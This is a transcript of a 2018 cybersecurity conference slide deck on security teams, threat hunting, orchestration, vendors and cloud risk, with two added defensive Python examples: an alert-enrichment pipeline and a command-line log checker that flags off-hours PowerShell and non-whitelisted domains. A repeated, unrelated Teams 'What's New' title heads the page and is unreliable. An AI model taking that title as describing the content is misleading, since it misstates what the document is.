What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 

Focus Your Humans Where They Should Focus

  • 1. Ben Johnson | Co-Founder & CTO March 7th, 2018 Practical Cyber Lessons from 500,000 Miles of Security Evangelism
  • 2. @chicagoben | @obsidiansec Background Check // Ben Johnson Co-Founder and CTO, Obsidian Co-Founder and Former CTO, Carbon Black Former CNO/Cyber // NSA, CIA, DoD
  • 3. AGENDA Introduction & Background Looking Inward People, Processes, Technology Looking Outward Vendors, Resellers, Analysts Cloud Call-Out Wrap-Up
  • 4. @chicagoben | @obsidiansec Today’s Goal? TO SPARK CONTEMPLATION (and give you something to remember!) https://www.slideshare.net/chicagoben/
  • 5. @chicagoben | @obsidiansec Cyber Scoreboard How are we doing?
  • 6. @chicagoben | @obsidiansec Plenty of Challenges SKILLS GAP DEPLOY-AND-DECAY =LACK OF CYBER SELF-ESTEEM HUGE DATA ATTACKER SUCCESSES
  • 7. @chicagoben | @obsidiansec Looking Inward People, Processes, & Technology
  • 8. @chicagoben | @obsidiansec People - Team “Individuals disappear on high performing teams.” - NASA
  • 9. @chicagoben | @obsidiansec People - Recruiting & Retaining “Hire for Passion, Train for Skill, Coach for Performance” “Passion, Capacity, Humility” Considerations: • Security Teams Need a Leader…and a Shield • Don’t hire just based on tool experience!! “Capacity” ... “Hire a bartender” • Mentoring & Growth Creative perks? New data? Coding to APIs? • Talent Density and Solving Challenging Problems https://venturebeat.com/2017/10/21/how-to-build-your-dynasty-hire-for-passion-train-for-skill-coach-for-performance/
  • 10. @chicagoben | @obsidiansec People - Too Many Distractions
  • 11. @chicagoben | @obsidiansec People - Essentialism “It is about making the wisest possible investment of your time and energy in order to operate at our highest point of contribution by doing only what is essential."” – Greg McKeown, Author of Essentialism
  • 12. @chicagoben | @obsidiansec People - Journey vs. Destination Security teams focus where they have autonomy. They get comfortable in this never-ending journey vs. driving toward new destinations.
  • 13. @chicagoben | @obsidiansec People - Culture “Culture eats strategy for breakfast” - P. Drucker
  • 14. @chicagoben | @obsidiansec Processes - Extend IT an Olive Branch
  • 16. @chicagoben | @obsidiansec Processes - Adversarial & Threat Modeling Cybercriminals • Broad-based and targeted • Financially motivated • Getting more sophisticated Hactivists • Targeted and destructive • Unpredictable motivations • Generally less sophisticated Nation-States • Targeted and multi-stage • Motivated by data collection • Highly sophisticated with endless resources Insiders • Targeted and destructive • Unpredictable motivations • Sophistication varies
  • 17. @chicagoben | @obsidiansec Processes - Hunting ▪ ALLOW FOR CREATIVITY. ALLOW HUNTERS TO ‘EXPLORE’ ▪ LOOK FOR RISK. LOOK FOR THREATS. ▪ EXCHANGE INFORMATION QUICKLY ▪ LOOK ACROSS THE STACK – CONTEXT ▪ DON’T WAIT FOR MACHINES ▪ MAKE SURE THERE ARE LESSONS LEARNED FROM EACH HUNT
  • 18. @chicagoben | @obsidiansec Processes - Hunting Outcomes ▪ NOT ALWAYS MALWARE OR APT OR MALICIOUS ACTIVITY. ▪ WHERE TO HUNT? ▪ WHAT TO HUNT? ▪ WHERE ARE MY GAPS? ▪ WHERE ARE MY STRENGTHS? ▪ WHERE DO I NEED MORE CARE AND FEEDING?
  • 19. @chicagoben | @obsidiansec Processes - Red + Blue = Purple • Sit red team next to blue team! • Once an attack or a technique works, have the blue team fix it (or update detection rules, etc), then immediately try again to make sure it is now prevented or detected • Drive Immediate Improvements
  • 20. @chicagoben | @obsidiansec Processes: Engineers vs Analysts
  • 21. @chicagoben | @obsidiansec TITLE TEXT Processes: Too Focused On Market Segments
  • 22. @chicagoben | @obsidiansec Layers-Fu: Focus on Capabilities Hunting & Collaborating Integration & Automation Hardening & Prevention Retrospection Behavior Detection Attribute Detection Remediation Triage Visibility
  • 23. @chicagoben | @obsidiansec Layers-Fu: ROI of Time? Hunting & Collaborating Integration & Automation Hardening & Prevention Retrospection Behavior Detection Attribute Detection Remediation Triage Visibility
  • 24. @chicagoben | @obsidiansec Technology: Prioritize Collection Compromised (attacker present) Recovered (attacker expelled) Breach Discovered (attacker identified) DWELL TIME Proactively collecting data here is automated, efficient & conclusive Reactively collecting data here is time consuming, expensive & incomplete Compromised (attacker present) Recovered (attacker expelled) Breach Discovered (attacker identified) DWELL TIME You know what questions you’ll have… Make sure you can answer them! Setup the video camera before the robbery. Move Fast, Don’t Wait on Technology!
  • 25. @chicagoben | @obsidiansec Technology: Visibility & Context Scanning Continuous Recording Continuous Recording + Intelligence Continuous Recording + Intelligence + Prevalence Continuous Recording + Intelligence + Prevalence + Relationships
• 26. Focus your humans where they should focus! Alert where it makes sense!
• 28. Technology: Visible, Surveyed Environment (graph view: nodes are processes & domains, clustered by affinity)
• 29. Technology: Integration & Automation ("JOIN, or DIE" reworked as "AUTOMATE, or DIE")
• 30. Technology: Orchestration (flow)
  ▪ Alert Generated
  ▪ Validate, Correlate, and Enhance: Threat Intelligence; Device History; User Profile & Behaviors
  ▪ Alert Enriched
  ▪ Remediation Actions: Block IPs; Kill Process, Preserve Evidence; Reset Credentials
• 31. Technology: Orchestration Case Study
  Pre-Orchestration:
  • 2 Security Engineers
  • 20 alerts a day
  • Manually processed 5 alerts (25%)
  • Data aggregation ~2 hours
  • Time to resolution ~7 days
  Post-Orchestration:
  • 2 Security Engineers
  • 200 alerts a day
  • Automatically process 100% of alerts
  • Data aggregation ~10 mins
  • Time to resolution is <1 hr
  “Orchestration allowed us to add additional pieces to the stack to cover more gaps without an increase in headcount. Today it is easier to install new security technology than hire people to run it; therefore, orchestration alleviates lack of available security talent.”
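The orchestration flow on slide 30 (alert generated, enrich with threat intelligence, device history and user behaviour, then choose remediation actions), as an added example that is not from the slides; the intel feed, device history, user profiles and the decision thresholds are all constructed stand-ins, and the actions are returned as labels rather than sent to a real firewall or EDR API.

```python
"""Added example: a minimal alert-orchestration pipeline.
Every data source below is a constructed stand-in for a real integration."""
from dataclasses import dataclass, field

# Constructed threat-intel feed: indicator -> confidence (0..1).
THREAT_INTEL = {"203.0.113.7": 0.9, "198.51.100.4": 0.3}
# Constructed device history: host -> prior alerts in the last 30 days.
DEVICE_HISTORY = {"ws-042": 3, "ws-107": 0}
# Constructed user profile: user -> hosts the user normally logs into.
USER_PROFILE = {"alice": {"ws-042"}, "bob": {"ws-107"}}


@dataclass
class Alert:
    host: str
    user: str
    remote_ip: str
    pid: int
    context: dict = field(default_factory=dict)


def enrich(alert: Alert) -> Alert:
    """Validate, correlate and enhance: attach intel, history and behaviour."""
    alert.context["intel_score"] = THREAT_INTEL.get(alert.remote_ip, 0.0)
    alert.context["prior_alerts"] = DEVICE_HISTORY.get(alert.host, 0)
    normal_hosts = USER_PROFILE.get(alert.user, set())
    alert.context["unusual_host"] = alert.host not in normal_hosts
    return alert


def decide(alert: Alert) -> list:
    """Map the enriched alert to remediation actions (thresholds are illustrative)."""
    ctx = alert.context
    actions = []
    if ctx["intel_score"] >= 0.8:
        actions.append(f"block_ip:{alert.remote_ip}")
    if ctx["intel_score"] >= 0.8 or ctx["prior_alerts"] >= 3:
        actions.append(f"kill_process:{alert.host}:{alert.pid}")
        actions.append(f"preserve_evidence:{alert.host}")
    if ctx["unusual_host"]:
        actions.append(f"reset_credentials:{alert.user}")
    return actions


def orchestrate(alert: Alert) -> list:
    """Full pipeline: alert in, list of remediation actions out."""
    return decide(enrich(alert))


if __name__ == "__main__":
    print(orchestrate(Alert("ws-042", "bob", "203.0.113.7", 4412)))
```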
• 32. Technology: Get Creative! (Open Source?)
• 33. Looking Inward: Quick Wins
  • Whitelist domains (top 10k?)
  • Disable Java & Flash!!
    • Or patch (Java => 70% of alerts disappeared overnight)
  • Restrict PowerShell to particular times of day!
  • Disable/expire admin accounts until you need them
  • Log every command line for common utilities
  • Can you “lock down” a particular division, group, etc.?
  • Give your HVTs/VIPs iPads!
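Two of the quick wins above (a PowerShell time-of-day window and a domain whitelist) checked against logged command lines, as an added example that is not from the slides; the log format, the 08:00-18:00 window, the tiny allowlist and the sample lines are all constructed.

```python
"""Added example: run two quick-win checks over command-line log lines.
Log format, policy window, allowlist and sample lines are constructed."""
import re
from datetime import time

# Hypothetical policy: PowerShell is expected only between 08:00 and 18:00.
PS_WINDOW = (time(8, 0), time(18, 0))
# Constructed stand-in for a "top 10k" domain allowlist (base domains).
ALLOWED_DOMAINS = {"example.com", "windowsupdate.com"}

# Constructed log format: "<ISO timestamp> <host> <user> <command line>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d) (?P<host>\S+) (?P<user>\S+) (?P<cmd>.+)$"
)
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
POWERSHELL_RE = re.compile(r"(?i)\bpowershell(\.exe)?\b")


def parse(line: str):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def in_window(ts: str) -> bool:
    """True if the HH:MM part of the timestamp falls inside PS_WINDOW."""
    t = time(int(ts[11:13]), int(ts[14:16]))
    return PS_WINDOW[0] <= t <= PS_WINDOW[1]


def base_domain(host: str) -> str:
    """Reduce a hostname to its last two labels (good enough for this toy list)."""
    return ".".join(host.lower().split(".")[-2:])


def findings(line: str) -> list:
    """Return a list of policy findings for one log line (empty if clean)."""
    rec = parse(line)
    if rec is None:
        return ["unparseable line"]
    out = []
    if POWERSHELL_RE.search(rec["cmd"]) and not in_window(rec["ts"]):
        out.append(f"powershell outside window: {rec['user']}@{rec['host']}")
    for host in URL_HOST_RE.findall(rec["cmd"]):
        if base_domain(host) not in ALLOWED_DOMAINS:
            out.append(f"non-whitelisted domain: {host}")
    return out


def scan(lines) -> dict:
    """Map each line that produced findings to its findings."""
    return {ln: findings(ln) for ln in lines if findings(ln)}
```

Feed `scan()` the command lines your endpoint tooling already records; the point is that once every command line is logged, policies like these become a few lines of checks rather than a new product.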
• 34. Looking Outward: Vendors, Resellers, & Analysts
• 35. Security Industry != Security Community (Proliferation vs. Consolidation)
• 36. Security Industry != Security Community
• 37. Vendors: Competing Priorities & Incentives
  • Big guys vs. small guys
  • Terminology war; press coverage
  • Hard to measure effectiveness
  • Don’t fall for ‘competitive traps’
  • YOUR PROBLEMS vs. product features
  • Force interoperability/integration
  • Partner w/ early stage companies: best time to capture innovation and value
• 38. Resellers: Competing Priorities & Incentives
  • Margins & relationships
  • Comfortable or easy
  • Large packages vs. niche deals
  • Verify that solutions match needs
  • Ask for new or holistic approaches
  • Get personal with resellers
• 39. Analysts: Competing Priorities & Incentives
  • Pay to play
  • Scoring based on discussions
  • Gamed / sponsored evaluations
  • Not operators
  • Understand the ‘why’ behind scoring
  • Ask which non-customer they like
  • Blogs vs. reports
• 40. Cloud Call Out (Do you understand the risks?)
• 41. Race to the Cloud! Lots of benefits of cloud adoption… we aren’t really here for that.
• 42. Cloud Security Responsibility
  ▪ Cloud Service Provider: responsible for security OF the cloud
  ▪ Customer: responsible for security IN the cloud
• 43. Cloud Security Responsibility: hackers want this! (the customer’s side of the model)
• 44. Wrapping Up (Take-Aways and more)
• 45. Take-Aways: Looking Inward
  • People
    ▪ Hire for passion, train for skill, coach for performance
    ▪ Focus on ROI of time
  • Processes
    ▪ Approach as an engineering problem
    ▪ Work with IT
    ▪ Concentrate on capabilities
  • Technology
    ▪ Integrate, automate, and orchestrate
    ▪ Blend open source & commercial
    ▪ Focus on how technology enhances humans
• 46. Take-Aways: Looking Outward
  • Interacting with Vendors
    ▪ Don’t fall for competitive traps
    ▪ Partner w/ early stage companies
  • Interacting with Resellers
    ▪ Verify that solutions match needs
    ▪ Get personal
  • Interacting with Analysts
    ▪ Understand the ‘why’
    ▪ Utilize their relationships for introductions
• 47. Take-Aways: Cloud Call-Out
  ▪ Understand where, how, and why you are using cloud. Understand who is responsible.
  ▪ Providers need to do more. They could reduce users shooting themselves in the foot, improve default security levels, and better show surface area. (Please encourage them to do more!)
  ▪ The rest is on you: Awareness, Auditing, Adaptation, Automation! (and don’t forget hygiene.)
• 48. COMPROMISE IS INEVITABLE
  ▪ The attacker only has to be successful once, but the defender has to stop 100% of attacks.
  ▪ Once the attacker is in your environment, they should have to be 100% perfect.
• 49. What About Top 5?
  • Approach security (risk management) as an engineering problem
  • Fix “Provision-and-Forget” and “Deploy-and-Decay”
  ▪ Reduce entropy, reduce risk (I.T. is your best friend)
  ▪ Treat your users as smart (enable your National Guard)
  ▪ Make it fun
  • 50. What’s Obsidian? (Other than a start-up in SoCal)
  • 51. Ben Johnson, CTO ben@obsidiansecurity.com @chicagoben | @obsidiansec THANK YOU! https://www.slideshare.net/chicagoben/